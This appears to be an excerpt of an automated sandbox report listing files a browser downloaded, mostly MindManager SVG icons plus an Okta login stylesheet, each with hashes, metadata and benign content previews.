                                                                Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):652
                                                                Entropy (8bit):4.919125756343137
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:09DD3718A4DE3FB3D90A7F30673BC3AA
                                                                SHA1:C5F70A361986EC9D782BAA60718A6A69F8A4CABB
                                                                SHA-256:4998E66746299BA0CB76F3D54D31A0F115D3B339C54072E17E78FDCBD38846A4
                                                                SHA-512:FDBD83406630A315767322049F8236499E6E94C807960B312328B76C8647FC1490520C75A676207E959D6FBEB5B8D6725769727A8AC43B847A7AAFFB168BE6BC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-presentation/svg/presentation-back.svg
                                                                Preview:<svg . xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13.03 9.45">. <defs>. <style>.cls-1{fill:#3a52a4;stroke:#3a52a4;stroke-miterlimit:10;}</style>. </defs>. <title>2018 Publish - back</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <path class="cls-1" d="M4.5.6A.31.31,0,0,1,4.73.5.31.31,0,0,1,5,.6a.31.31,0,0,1,.1.23.31.31,0,0,1-.1.23L1.61,4.4H12.2a.32.32,0,0,1,.33.33.32.32,0,0,1-.09.23.32.32,0,0,1-.24.09H1.61L5,8.4a.32.32,0,0,1,0,.46.25.25,0,0,1-.1.07l-.12,0-.12,0a.26.26,0,0,1-.11-.07L.59,5A.31.31,0,0,1,.5,4.72a.32.32,0,0,1,.09-.23Z"/>. </g>. </g>.</svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2858
                                                                Entropy (8bit):4.344076929684339
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5E0A98DC996EB38EC2969FFE1ED6A602
                                                                SHA1:BEA8D90CE8FBD7EC54BC78A226FC1121A391C5FF
                                                                SHA-256:9DA904A222DE8D3034E07B43FF4584EF417DEB897D41A6E6C9630166C3819896
                                                                SHA-512:D52CE593417A7CF8B8F3A5EF9900275433EF2F6FBE1D8DBC9BE8ABD7412602A494D9AA4C70A1723C32177C91B3ACFBF303427658AEC2059DE6AF9385EED9942F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-attachments-toggle.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18"><defs><style>.cls-1{fill:gray;}.cls-2{fill:#fff;}</style></defs><title>control_strip_Attachment_1</title><path class="cls-1" d="M7.53,16.48a4.83,4.83,0,0,1-4.87-5.12A5.32,5.32,0,0,1,4.32,7.77L8,4.31,9.15,5.5,5.45,9a3.48,3.48,0,0,0-.29,4.9,3.2,3.2,0,0,0,2.35,1h0a3.69,3.69,0,0,0,2.55-1l3.7-3.46,1.13,1.19L11.19,15A5.31,5.31,0,0,1,7.53,16.48Z"/><path class="cls-2" d="M8,5l.44.47L5.11,8.6a4,4,0,0,0-.31,5.6,3.7,3.7,0,0,0,2.71,1.15,4.24,4.24,0,0,0,2.9-1.18l3.33-3.12.44.47-3.33,3.11A4.82,4.82,0,0,1,7.53,16a4.36,4.36,0,0,1-3.19-1.35,4.61,4.61,0,0,1,.33-6.5L8,5m0-1.4-.72.67L4,7.4a5.62,5.62,0,0,0-.37,7.92A5.36,5.36,0,0,0,7.53,17a5.84,5.84,0,0,0,4-1.62l3.32-3.11.74-.69-.69-.73-.45-.47-.68-.72-.72.68L9.72,13.44a3.2,3.2,0,0,1-2.21.91,2.71,2.71,0,0,1-2-.84A3,3,0,0,1,5.8,9.32L9.12,6.21l.74-.69-.69-.73-.45-.47L8,3.61Z"/><path class="cls-1" d="M9.07,11.2l3.34-3.06a2.5,2.5,0,0,0,.79-1.58A1.93,1.93,0,0,0,12.67,5a1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1547
                                                                Entropy (8bit):4.881020264116043
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F9F093D65C2B91127A84687453A7971C
                                                                SHA1:4A71C245DA0B1AC4C9789D028B825DB67730A946
                                                                SHA-256:D042D69DC0C850C2E449003449014E783F0712D9436EFB215DBF261875342318
                                                                SHA-512:CD3CBC14A60F60D4438AB0697F06801FE48CBFB7966698762595F5ECBC5658B36021574254F48D0882853B2310AC03157A78CC6255152AA9F035CEFDBDAD6641
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_add_sticky_note.svg
                                                                Preview:<svg width="24" height="25" viewBox="0 0 24 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1836_5786)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M1.09091 0.074585C0.488417 0.074585 0 0.563002 0 1.16549V22.9837C0 23.5862 0.488417 24.0746 1.09091 24.0746H16.1891L24 16.2637V1.16549C24 0.563002 23.5116 0.074585 22.9091 0.074585H1.09091Z" fill="#96BE7D"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M1.09091 1.16549V22.9837H15.7372L22.9091 15.8118V1.16549L1.09091 1.16549ZM24 16.2637L16.1891 24.0746H1.09091C0.488417 24.0746 0 23.5862 0 22.9837V1.16549C0 0.563002 0.488417 0.074585 1.09091 0.074585H22.9091C23.5116 0.074585 24 0.563002 24 1.16549V16.2637Z" fill="#63A558"/>.<path d="M15.5774 23.5219L23.527 15.5724H17.0608C16.0755 15.5724 15.5773 16.2136 15.5774 17.0241C15.5776 19.3117 15.5774 23.5219 15.5774 23.5219Z" fill="#63A558"/>.<path d="M13.6364 15.8928H13.0909H10.9091H10.3636V15.3473V13.711H8.72728H8.18182V13.1655V10.9837V10.4382H8.72728H10.3636V
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2902
                                                                Entropy (8bit):4.938282067876706
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:18CCD869BF62DABD544F9A3E4ED6B36B
                                                                SHA1:0ED673B5DD95267E3E5F67D043E45B4CC1FC3BE4
                                                                SHA-256:519EBCEF93426B69CE222353D744EA63DB5BF93F9319C91CF668A49A46B1D098
                                                                SHA-512:48DC74B29C2C55CA62468D917E9C776CAA2E9AF226E05FF7349B2113B87EBD92DCDEAE749B0C32FE63932CC9D751C9965D1C9AE7272C834CD01C691FE21352B8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/impacteffortmatrix.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M44 2.43008H83.8356C84.3326 2.43008 84.7356 2.83302 84.7356 3.33008V44.1656C84.7356 44.6627 84.3326 45.0656 83.8356 45.0656H43C42.5029 45.0656 42.1 44.6627 42.1 44.1656V4.33008C42.1 3.28074 42.9507 2.43008 44 2.43008Z" fill="#F3A735" stroke="white" stroke-width="0.2"/>.<path d="M43 45.2641H83.8356C84.3326 45.2641 84.7356 45.667 84.7356 46.1641V86.9996C84.7356 87.4967 84.3326 87.8996 83.8356 87.8996H44C42.9507 87.8996 42.1 87.049 42.1 85.9996V46.1641C42.1 45.667 42.5029 45.2641 43 45.2641Z" fill="#ECD5D5" stroke="white" stroke-width="0.2"/>.<path d="M85.834 2.43008H125.67C126.719 2.43008 127.57 3.28074 127.57 4.33008V44.1656C127.57 44.6627 127.167 45.0656 126.67 45.0656H85.834C85.3369 45.0656 84.934 44.6627 84.934 44.1656V3.33008C84.934 2.83302 85.3369 2.43008 85.834 2.43008Z" fill="#9B0833" stroke="white" stroke-width="0.2"/>.<path d="M85.834 45.2641H126.67C127.167 45.2641 127.57
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4615
                                                                Entropy (8bit):3.98533851564846
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8D6557BCEE0E3FF7A56E8B23480036D8
                                                                SHA1:88B2EA4608CF0AE6C21137140737579904D7CCE9
                                                                SHA-256:4A6BE5A6D0AA3A832B291D0FD86C2ABAB59F4759B7C7EA4634B63BAE0AB0F52B
                                                                SHA-512:8594070B542C42518CD40BC93005311CCBBE3D8ADAAAD42740EF6CA2C3455BD111D5A23A3ABB379A03BCDD3209B0D5F4F0B66E230C587DE24A65B66CDB6CB4A8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-hyperlinks-toggle.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18"><defs><style>.cls-1{fill:#528cc9;}.cls-2{fill:#fff;}</style></defs><title>control_strip_Link_1</title><path class="cls-1" d="M6.47,15.31A4.45,4.45,0,0,1,4.76,15a4.14,4.14,0,0,1-.69-.39l-.32-.19-.56-.57,0-.06a4.14,4.14,0,0,1-.42-4.5,3.22,3.22,0,0,1,.34-.56l.17-.26L5.38,6.28l.06,0L5.8,6a4.87,4.87,0,0,1,1-.48,4.56,4.56,0,0,1,1.38-.22A4,4,0,0,1,11,6.57a1.38,1.38,0,0,1,.26,1.61A1.45,1.45,0,0,1,10.05,9a.85.85,0,0,1-.23,0A1.75,1.75,0,0,1,9,8.55a1.49,1.49,0,0,0-1-.38,1.38,1.38,0,0,0-1,.42L5.71,10l-.19.19a1.36,1.36,0,0,0,0,1.94,1.28,1.28,0,0,0,.93.39,1.43,1.43,0,0,0,1-.43l.2-.2a1.53,1.53,0,0,1,1.09-.49,1.36,1.36,0,0,1,.79.26,1.38,1.38,0,0,1,.42,1.83l0,.1-.11.13-.66.66-.06,0L8.73,14l.26.43A4.21,4.21,0,0,1,6.47,15.31Z"/><path class="cls-2" d="M8.15,5.83a3.5,3.5,0,0,1,2.52,1.1.87.87,0,0,1,.16,1,.92.92,0,0,1-.78.52l-.14,0a1.22,1.22,0,0,1-.57-.28A2,2,0,0,0,8,7.67a1.9,1.9,0,0,0-1.33.57c-.85.85-.7.69-1.54,1.55
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1701
                                                                Entropy (8bit):5.046334457687283
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DB06CF8A83E41D8C32007ABCF12A1DD2
                                                                SHA1:4404D5243E5A14B8DE2489FC9A9D9521E9E07DCA
                                                                SHA-256:04C0E0B992DBED02B2D5C8D753B3DAA64901736491D75349A701E1AB883B63E7
                                                                SHA-512:D93CC966DD6F46821FCC00271B3FC293DBBD5617561F58A380D24F8B2713872A6045C12B7A978295F6E1DA088947545284FA72539F0DCE41DE09AE3CB956337B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/icon_settings.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 9 16"><defs><style>.cls-1{fill:#7dafde;}.cls-2{fill:#4e86c5;}.cls-3{fill:gray;}.cls-4{fill:#c8c8c8;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M3,15.89c-.33,0-1-.08-1-.39v-.39A1.12,1.12,0,0,0,4,15v.55C4,15.74,3.47,15.89,3,15.89Zm1-1.76A1.11,1.11,0,0,0,2,14V4.5c0-.22,0-.27-1-1.21,0-.1,0-.2,0-.29H5c0,.12,0,.24,0,.37a2.13,2.13,0,0,1-.75.7L4,4.21Z" transform="translate(-0.5 -0.5)"/><path class="cls-2" d="M4.2,3.5,4,3.63l-.51.29V13a1.62,1.62,0,0,0-.54-.1A1.77,1.77,0,0,0,2.5,13V4.5c0-.35-.1-.55-.55-1H4.2m.3-3v2h-3V.5c-1,0-1,3-1,3s1,.94,1,1v11c0,.68.78.89,1.46.89s1.54-.21,1.54-.89V4.5h0a2.55,2.55,0,0,0,1-1s0-3-1-3ZM3,15.16a.62.62,0,0,1,0-1.24.62.62,0,1,1,0,1.24ZM4.5,4.5Zm0,0Zm0,0Zm0,0Zm0,0Zm0,0v0Zm0,0Z" transform="translate(-0.5 -0.5)"/><path class="cls-3" d="M7.88,9.73h0c-.33,0-.38.11-.38-.23v-5c0-.34,0-.92.38-.92h0a.61.61,0,0,1,.62.61V9.12A.62.62,0,0,1,7.88,9.73Z" transf
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 14 x 17, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):366
                                                                Entropy (8bit):6.998194854574043
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2B3D5071CE21359C3CEC98317FF1F148
                                                                SHA1:D80560665AD4FDE60F6B605891B1D1B52923781C
                                                                SHA-256:5352C6771E5260C47666C724A666FD6016CAAD743DA18746385A6937A63823F7
                                                                SHA-512:43DBE58AEFD9D3185247A1C27D728EFE19BA09EA90350707F3567AFABD576F0D99AAC481A3F0DED663A0586266180C2D583FA219C33589FB19E26693D217B0B4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-trash.png
                                                                Preview:.PNG........IHDR....................pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.S...0.L....He.v.`...0.,.B,.l..`..A.A...&.vuA..J.$...+I..S....#.%I.2$......<..)..1...s..%0.y....K.|....ag._.f"......$....f..U.I.6.4...e..%...pX^.9....d!.>.S.'.....Is.!..,.}9.-...Z+#H....Uw...3B..#..H..V./..L.h...#.........}-....i.../.....R...S.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):270
                                                                Entropy (8bit):4.840496990713235
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:40EB39126300B56BF66C20EE75B54093
                                                                SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/mnyr0U0D6CO0iNJ8ssPWfSXYJhMlXYuv7SjkLeoz1nwg78150
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):803
                                                                Entropy (8bit):5.114531423231643
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:68F890432E280FE0DA90EFFDE0F9D8C0
                                                                SHA1:2C2116D760BCD99711A58B67A9151F0039367BC5
                                                                SHA-256:01A6EEFA5F7C9AD31FDECB61E32ACCE68A0F7579C4DE2A54466D0A1243EB6FA7
                                                                SHA-512:793325625D3165C6F6FB25B24299D8F118379E08AC4E6A2BD30481795552F3D960A3488C638742A28F86043967665702073B739A3EAE6B1ABA032A8274FB1DAF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/scales.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}</style></defs><title>scale_16</title><rect class="cls-1" x="1.99" y="2.9" width="12.16" height="1" rx="0.5" ry="0.5" transform="translate(-0.45 1.38) rotate(-9.51)"/><rect class="cls-1" x="8" width="1" height="3" rx="0.5" ry="0.5"/><rect class="cls-1" x="8" y="3" width="1" height="13" rx="0.5" ry="0.5"/><path class="cls-1" d="M3.62,7.83,4.81,11H2.44L3.62,7.83M3.62,5,1,12H6.25L3.62,5Z"/><path class="cls-1" d="M1,11a2.63,2.63,0,0,0,2.62,2.22A2.64,2.64,0,0,0,6.25,11Z"/><path class="cls-1" d="M12.38,5.83,13.56,9H11.19l1.19-3.17m0-2.85L9.75,10H15L12.38,3Z"/><path class="cls-1" d="M9.75,9A2.66,2.66,0,0,0,15,9Z"/><rect class="cls-1" x="5" y="15" width="7" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):723
                                                                Entropy (8bit):4.738618658321615
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B7582FF384BE79BAC6A5BC27D9E7A0D3
                                                                SHA1:E2FFC928973229232EEBB1DDC7D42872CC9B0CFF
                                                                SHA-256:B4384AC8F425C14B073D556D9EDF105292AF609801E03AF11CB4A8220EF7B32F
                                                                SHA-512:839BD3BCB643AC3B5CB21AD66462D6F3511C3EF6FC73598C913FA51F2BA427EFFA3FFCF582D57FAF0D16A541C56CDB87E3D2D3E013311326B37BC60B70996BDD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-presentation/svg/menu.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 11.4 8.15"><defs><style>.cls-1{fill:#3a52a4;stroke:#3a52a4;stroke-miterlimit:10;}</style></defs><title>2018 Publish - Menu</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M.82,1.15A.31.31,0,0,1,.6,1.06.31.31,0,0,1,.5.83.32.32,0,0,1,.6.59.32.32,0,0,1,.82.5h9.75a.32.32,0,0,1,.23.09.32.32,0,0,1,.1.24.31.31,0,0,1-.1.23.31.31,0,0,1-.23.09Zm0,3.25A.33.33,0,0,1,.5,4.08a.32.32,0,0,1,.1-.24.32.32,0,0,1,.23-.09h9.75a.32.32,0,0,1,.23.09.32.32,0,0,1,.1.24.33.33,0,0,1-.32.32Zm0,3.25A.33.33,0,0,1,.5,7.33a.32.32,0,0,1,.1-.24A.32.32,0,0,1,.82,7h9.75a.32.32,0,0,1,.23.09.32.32,0,0,1,.1.24.33.33,0,0,1-.32.32Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 21 x 29, 8-bit colormap, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):557
                                                                Entropy (8bit):6.23779844738169
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9C675C1FA2DE5455FFDE02C314009A15
                                                                SHA1:81270023990EA78724F2169F49B59D2241C00E3F
                                                                SHA-256:F6B4CC40893132727E00B700B9C0308CDE837B4E3AD026C4E7F80CD6345388F5
                                                                SHA-512:CA96B6DEADAA52A0548536F2A8B7EFA789DF50D8B1D5EC4B133DA55F3F5E5F85767D67679D76DC0B7F8352694EBCB1DAADF564A1641595068932D13206381121
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/pointer-text.png
                                                                Preview:.PNG........IHDR.............r.......gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<...6PLTE............@@@.......................................T.Sm....tRNS...(.xh`X8 .0P.,......bKGD..=.....oFFs..........mT*....pHYs.........c......vpAg... ... .........IDAT(..... ..`.k.."....6..w#....Q....u....U7l...._....W-.sS...."..&...tt.v.t..e5f..eM...4S.2..T."..R......(.......x.djU..o...X.U!..a..D.uF....6ND....H..$l....%6...%tEXtdate:create.2017-04-18T02:43:19+03:00rH.....%tEXtdate:modify.2017-04-18T02:43:19+03:00........IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):754
                                                                Entropy (8bit):5.084415272124582
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:373890CAFAE4C7A52225441ED98B5CAD
                                                                SHA1:E030F319469222E048DC19419E7DADDB6DC6FFA9
                                                                SHA-256:0A61D02553C748AA2D93C5C16B398D9AFC00C36C09293E4BF118BD49A23318D5
                                                                SHA-512:4C4B230AEFD876E258B73E083C4AB007CA6111049BBFD0EF3D2FB9FBD6F6B49F1D575DF1E2F645D46696421FE4352C579120D697083956CD8E619806E2F5E3A3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/clock.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f2f2f2;}.cls-2{fill:#754a12;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>time_15_16</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><circle class="cls-1" cx="8" cy="8" r="6"/><path class="cls-3" d="M8,2.5A5.5,5.5,0,1,1,2.5,8,5.51,5.51,0,0,1,8,2.5m0-1A6.5,6.5,0,1,0,14.5,8,6.51,6.51,0,0,0,8,1.5Z"/><polygon class="cls-4" points="11 8 7 8 7 9 11 9 11 8 11 8"/><rect class="cls-4" x="7" y="5" width="1" height="4"/><rect class="cls-3" x="8" y="5" width="1" height="3"/><rect class="cls-3" x="8" y="7" width="3" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1258
                                                                Entropy (8bit):4.731068932714075
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1FFFD228B8A92A9782FB9EDEC0D83948
                                                                SHA1:B80BDC6E026143DE4972D71FF9E11D0E17647B55
                                                                SHA-256:9A71306040E6AA3767DF8B5572CAAC29438A856323D3A62A4E03E65ADB095C0B
                                                                SHA-512:2008D286336A7BF60F41A2E121B85A63AD95FEC3D7F2986638BD541BD05506C54353004A41614BD78CA8656FBAE70766A0C90488361F9D715A31244F3D57B555
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/smiley-screaming.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#f03637;}.cls-3{fill:#fff;}.cls-4{fill:#333;}</style></defs><title>emoji_11_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><path class="cls-2" d="M2.26,9A5.75,5.75,0,0,0,13.74,9Z"/><rect class="cls-3" x="3" y="9" width="10" height="1"/><rect class="cls-4" x="6" y="6" width="4" height="1"/><rect class="cls-4" x="10" y="5" width="1" height="1"/><rect class="cls-4" x="11" y="4" width="1" height="1"/><rect class="cls-4" x="10" y="6" width="1" height="1"/><rect class="cls-4" x="11" y="5" width="1" height="1"/><rect class="cls-4" x="10" y="7" width="1" height="1"/><rect class="cls-4" x="11" y="8" width="1" height="1"/><rect class="cls-4" x="11" y="7" width="1" height="1"/><rect class="cls-4" x="5" y="5" width="1" height="1"/><rect class="cls-4" x="4" y="4" width="1" height="1"/><rect class="cls-4" x="5" y="6" width="1" height="1"/><rect class="cls-4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (10450)
                                                                Category:downloaded
                                                                Size (bytes):10498
                                                                Entropy (8bit):5.327380141461276
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E0D37A504604EF874BAD26435D62011F
                                                                SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):679
                                                                Entropy (8bit):4.809258557922115
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F36E5CE4BDECFAC2E496B0010B6AB88E
                                                                SHA1:94863DBAE442352552C0092EE60DF7B0501B87FB
                                                                SHA-256:FD5CAA13EC3D7737ED992D6A996DEEBACC2A31A8C82465FF564615FC99483DBC
                                                                SHA-512:7752E934A592379C24F0154302D04E41D4CFD0B5F1B479BB9036C76234AF0CB31E56DB16B0CB28DA9D86F69E0E454A98D89CFA2C41E9F85F59636A095AE64FAA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/thumbs-down.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}</style></defs><title>feedback_12_16</title><path class="cls-1" d="M15.91,8a1.39,1.39,0,0,1-1.38,1H10.14a1.46,1.46,0,0,0,0,.47,7.49,7.49,0,0,0,.81,2c.33.58.46,3.32-.14,3.73a1.33,1.33,0,0,1-1.86-.34l-.75-2.75L6.68,10C6.4,9.59,5,8,5,8V.68L7.34,0h5.07a1.41,1.41,0,0,1,1.37,1,1.26,1.26,0,0,1,0,.86,1.32,1.32,0,0,1,1,1.29,1.33,1.33,0,0,1-.43,1A1.33,1.33,0,0,1,15.4,5.4a1.35,1.35,0,0,1-.44,1A1.33,1.33,0,0,1,15.91,8Z"/><path class="cls-1" d="M4,1V7H1V1H4m.48-1h-4A.52.52,0,0,0,0,.52v7A.52.52,0,0,0,.52,8h4A.52.52,0,0,0,5,7.48v-7A.52.52,0,0,0,4.48,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):739
                                                                Entropy (8bit):5.382001502401777
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4039027BA31FB5AC069B600C7C113495
                                                                SHA1:BB0A7C49C3FC85BF812D080BF0092C10BA3DF56F
                                                                SHA-256:21282B1577A75DEEBB45719BB3BD7E63B18DBC8909E7CE689F6FE81EE811D638
                                                                SHA-512:19210AA5645A61EFF9AC86B0FE8DFD9B006647409E52036FF4C57A672E0459D5E5D6A2859BA8EBAE9DC3EEA520770FC78E422D6E09DBE8F9544DCA3C9F7213D0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-toolbar/svg/transform.svg
